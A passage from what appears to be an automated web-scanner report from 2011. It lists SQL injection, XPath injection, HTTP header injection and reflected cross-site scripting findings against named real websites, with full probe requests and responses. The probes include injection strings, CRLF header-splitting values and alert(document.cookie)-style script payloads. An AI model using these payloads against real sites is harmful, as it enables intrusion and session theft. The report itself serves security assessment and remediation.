The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25

500 Internal Server Error

Request 2

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...

1.5. http://www.fulbright.com/index.cfm [FUSEACTION parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.6. http://www.fulbright.com/index.cfm [article_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 12: Incorrect syntax near ''.
</font>
...[SNIP]...

1.7. http://www.fulbright.com/index.cfm [emp_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 60: Incorrect syntax near ''.
</font>
...[SNIP]...

1.8. http://www.fulbright.com/index.cfm [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 4: Incorrect syntax near ''.
</font>
...[SNIP]...

1.9. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.10. http://www.fulbright.com/index.cfm [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 9: Incorrect syntax near ''.
</font>
...[SNIP]...

2. XPath injection  previous  next
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite'/Img HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:02:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.2. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite/Img' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:06:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

3. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://accuserve.homestead.com/files/a_ripple.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accuserve.homestead.com
Path:   /files/a_ripple.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1
Host: accuserve.homestead.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 19 Jan 2011 15:20:44 GMT
Location: /files/acc91
f14ecc46de1
/


3.2. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:99487
1735d591256
;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:47 GMT
Date: Wed, 19 Jan 2011 18:00:54 GMT
Connection: close
Content-Length: 2018

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',99487
1735
...[SNIP]...

3.3. http://livingsocial.com/deals/socialads_reflector [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://livingsocial.com
Path:   /deals/socialads_reflector

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1
Host: livingsocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 19 Jan 2011 18:10:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80
7b239144ac4


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

4. Cross-site scripting (reflected)  previous  next
There are 347 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:00:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

4.2. http://ads.roiserver.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
